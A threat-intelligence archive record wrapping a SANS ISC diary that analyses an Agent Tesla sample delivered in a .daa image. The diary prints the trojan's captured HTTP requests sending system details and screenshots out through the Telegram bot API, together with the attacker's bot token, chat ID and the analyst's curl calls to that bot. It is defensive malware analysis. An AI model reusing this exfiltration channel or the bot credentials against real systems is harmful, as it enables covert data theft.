{
	"id": "4f25a5e6-8875-41d7-b406-f332be4aa5c4",
	"created_at": "2026-04-06T00:11:43.197752Z",
	"updated_at": "2026-04-10T03:20:58.032404Z",
	"deleted_at": null,
	"sha1_hash": "b898212a2fafcafc81cf8f99a0845a1d49c16745",
	"title": "Agent.Tesla Dropped via a .daa Image and Talking to Telegram",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 338940,
	"plain_text": "Agent.Tesla Dropped via a .daa Image and Talking to Telegram\r\nBy SANS Internet Storm Center\r\nArchived: 2026-04-05 19:18:35 UTC\r\nA few days ago, I found an interesting file delivered by email (why change a winning combination?). The file has a\r\nnice extension: “.daa” (Direct Access Archive). We already reported such files in 2019 and Didier wrote a diary[1]\r\nabout them. Default Windows installation, can’t process “.daa” files, you need a specific tool to open them (like\r\nPowerISO). I converted the archive into an ISO file and extracted the PE file inside it.\r\nThe sample was called “E445333###.exe”\r\n(SHA256:853a7edf8144e06014e0c1a841d1f1840de954a866d5ce73ff12833394ff0ead) and has a VT score of\r\n48/70[2]. It’s a classic Agent.Tesla but this one uses another C2 channel to exfiltrate data. Instead of using open email\r\nservers, it uses Telegram (the messenger application). I started to debug the PE file (a classic .Net executable) but it\r\ntook a lot of time before reaching some interesting activity so I took another approach and went back to a classic\r\nbehavioral analysis. I fired a REM Workstation, connected it to the Internet through a REMnux, and launched the\r\nexecutable.\r\nIt took some time (approx 15 mins) before I saw the first connection to api[.]telegram[.]org:\r\nPOST hxxps://api[.]telegram[.]org/bot1815802853:AAFwTZ6mRU-UOmcTcCR8glZAAkNmzHpMkL8/sendDocument HTTP/1\r\nContent-Type: multipart/form-data; boundary=---------------------------8d94d2d30eed79c\r\nHost: api.telegram.org\r\nContent-Length: 983\r\nExpect: 100-continue\r\nConnection: Keep-Alive\r\n-----------------------------8d94d2d30eed79c\r\nContent-Disposition: form-data; name=\"chat_id\"\r\n1599705393\r\n-----------------------------8d94d2d30eed79c\r\nContent-Disposition: form-data; name=\"caption\"\r\nNew Log Recovered!\r\nUser Name: REM/DESKTOP-2C3IQHO\r\nOSFullName: Microsoft Windows 10 Enterprise\r\nCPU: Intel(R) Core(TM) i9-9980HK CPU @ 2.40GHz\r\nRAM: 8191.49 MB\r\n-----------------------------8d94d2d30eed79c\r\nContent-Disposition: form-data; name=\"document\"; filename=\"REM-DESKTOP-2C3IQHO 2021-07-22 04-24-32.html\r\nContent-Type: text/html\r\nhttps://isc.sans.edu/diary/27666\r\nPage 1 of 4\n\nTime: 07/22/2021 16:24:31  \nUser Name: REM  \nComputer Name: DESKTOP-2C3IQHO  \nOSFullName: Microsoft\n-----------------------------8d94d2d30eed79c--\nAnd the reply:\nHTTP/1.1 200 OK\nServer: nginx/1.18.0\nDate: Thu, 22 Jul 2021 14:24:34 GMT\nContent-Type: application/json\nContent-Length: 662\nConnection: keep-alive\nStrict-Transport-Security: max-age=31536000; includeSubDomains; preload\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: GET, POST, OPTIONS\nAccess-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection\n{\"ok\":true,\"result\":{\"message_id\":6630,\"from\":{\"id\":1815802853,\"is_bot\":true,\"first_name\":\"Bigdealz\",\"u\nA few minutes later, the Trojan started to exfiltrate screenshots:\nPOST hxxps://api[.]telegram[.]org/bot1815802853:AAFwTZ6mRU-UOmcTcCR8glZAAkNmzHpMkL8/sendDocument HTTP/1\nContent-Type: multipart/form-data; boundary=---------------------------8d94d3662696c53\nHost: api.telegram.org\nContent-Length: 194635\nExpect: 100-continue\nConnection: Keep-Alive\n-----------------------------8d94d3662696c53\nContent-Disposition: form-data; name=\"chat_id\"\n1599705393\n-----------------------------8d94d3662696c53\nContent-Disposition: form-data; name=\"caption\"\nNew Screenshot Recovered!\nUser Name: REM/DESKTOP-2C3IQHO\nOSFullName: Microsoft Windows 10 Enterprise\nCPU: Intel(R) Core(TM) i9-9980HK CPU @ 2.40GHz\nRAM: 8191.49 MB\n-----------------------------8d94d3662696c53\nContent-Disposition: form-data; name=\"document\"; filename=\"REM-DESKTOP-2C3IQHO 2021-07-22 05-30-21.jpeg\nContent-Type: image/jpeg\nJFIF``C\nhttps://isc.sans.edu/diary/27666\nPage 2 of 4\n\n(1#%(:3=\u003c9387@H\\N@DWE78PmQW_bghg\u003eMqypdx\\egcC//cB8BccccccccccccccccccccccccccccccccccccccccccccccccccOm\"\r\n[stuff deleted]\r\nThe file that is uploaded contains a timestamp. This confirmed to me that a screenshot is exfiltrated every hour.\r\nBecause we know the bot ID, we can interact with it.\r\nLet’s check the bot info:\r\nremnux@remnux:~$ curl -s hxxps://api[.]telegram[.]org/bot1815802853:AAFwTZ6mRU-UOmcTcCR8glZAAkNmzHpMkL8\r\n{\r\n \"ok\": true,\r\n \"result\": {\r\n \"id\": 1815802853,\r\n \"is_bot\": true,\r\n \"first_name\": \"Bigdealz\",\r\n \"username\": \"Bigdealzbot\",\r\n \"can_join_groups\": true,\r\n \"can_read_all_group_messages\": false,\r\n \"supports_inline_queries\": false\r\n }\r\n}\r\nhttps://isc.sans.edu/diary/27666\r\nPage 3 of 4\n\nThe user the bot is talking to is \"Graciasmith1\" (still online on Telegram when I'm writing this diary). Let's make it\r\naware that we are also alive:\r\nremnux@remnux:~$ curl -s hxxps://api[.]telegram[.]org/bot1815802853:AAFwTZ6mRU-UOmcTcCR8glZAAkNmzHpMkL\r\n{\r\n \"ok\": true,\r\n \"result\": {\r\n \"message_id\": 6884,\r\n \"from\": {\r\n \"id\": 1815802853,\r\n \"is_bot\": true,\r\n \"first_name\": \"Bigdealz\",\r\n \"username\": \"Bigdealzbot\"\r\n },\r\n \"chat\": {\r\n \"id\": 1599705393,\r\n \"first_name\": \"Gracia\",\r\n \"last_name\": \"Smith\",\r\n \"username\": \"Graciasmith1\",\r\n \"type\": \"private\"\r\n },\r\n \"date\": 1627107886,\r\n \"text\": \"Ping\"\r\n }\r\n}\r\nAs you can see, today it's very touchy to spot malicious activity just by watching classic IOCs like IP addresses or\r\ndomain names. Except if you prevent your users to access social networks like Telegram, who will flag traffic to\r\napi.telegram.org as suspicious? Behavioral monitoring can be the key: You can see requests at regular intervals,\r\noutside business hours, or from hosts that should not execute social network applications. Because your servers can\r\naccess the Internet directly, right? ;-)\r\n[1] https://isc.sans.edu/forums/diary/The+DAA+File+Format/25246\r\n[2]\r\nhttps://www.virustotal.com/gui/file/853a7edf8144e06014e0c1a841d1f1840de954a866d5ce73ff12833394ff0ead/detection\r\nXavier Mertens (@xme)\r\nSenior ISC Handler - Freelance Cyber Security Consultant\r\nPGP Key\r\nSource: https://isc.sans.edu/diary/27666\r\nhttps://isc.sans.edu/diary/27666\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://isc.sans.edu/diary/27666"
	],
	"report_names": [
		"27666"
	],
	"threat_actors": [],
	"ts_created_at": 1775434303,
	"ts_updated_at": 1775791258,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b898212a2fafcafc81cf8f99a0845a1d49c16745.pdf",
		"text": "https://archive.orkl.eu/b898212a2fafcafc81cf8f99a0845a1d49c16745.txt",
		"img": "https://archive.orkl.eu/b898212a2fafcafc81cf8f99a0845a1d49c16745.jpg"
	}
}